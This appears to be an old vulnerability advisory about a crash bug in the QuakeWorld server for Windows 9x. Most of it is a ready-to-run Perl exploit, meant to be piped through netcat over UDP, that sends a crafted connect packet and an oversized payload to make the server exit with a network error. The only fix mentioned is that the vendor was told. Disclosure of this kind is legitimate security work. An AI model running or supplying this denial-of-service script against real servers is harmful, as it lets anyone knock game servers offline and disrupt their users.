COMMAND

    Quakeworld

SYSTEMS AFFECTED

    win32 (9x)

PROBLEM

    Paul  Boehm  found  following.   The  output  of the attached perl
    script, when piped through  netcat, crashes quakeworld for  win32.
    Exploit follows:

        #!/usr/bin/perl
        # qwsvwin32-crasher by infected@cia.at
        #
        # usage : ./qwcrash | nc -u host port
        # result: qwsv for win32 should exit with: ERROR: NET_GetPacket: Unknown error
        # reason: ? (winsock?)
        #
        #

        print chr(255) x 4 . "getchallenge\n";
        print chr(255) x 4 . 'connect 28 26914 1960732995 "\noaim\0\msg\1\rate\2500\team\bla\topcolor\3\bottomcolor\11\skin\bla\pmodel\33168\emodel\6967\name\bla"' . "\n";
        print "x" x 4400;

SOLUTION

    Zoid (idsoftware) has  been mailed some  weeks ago, but  he didn't
    look very interested...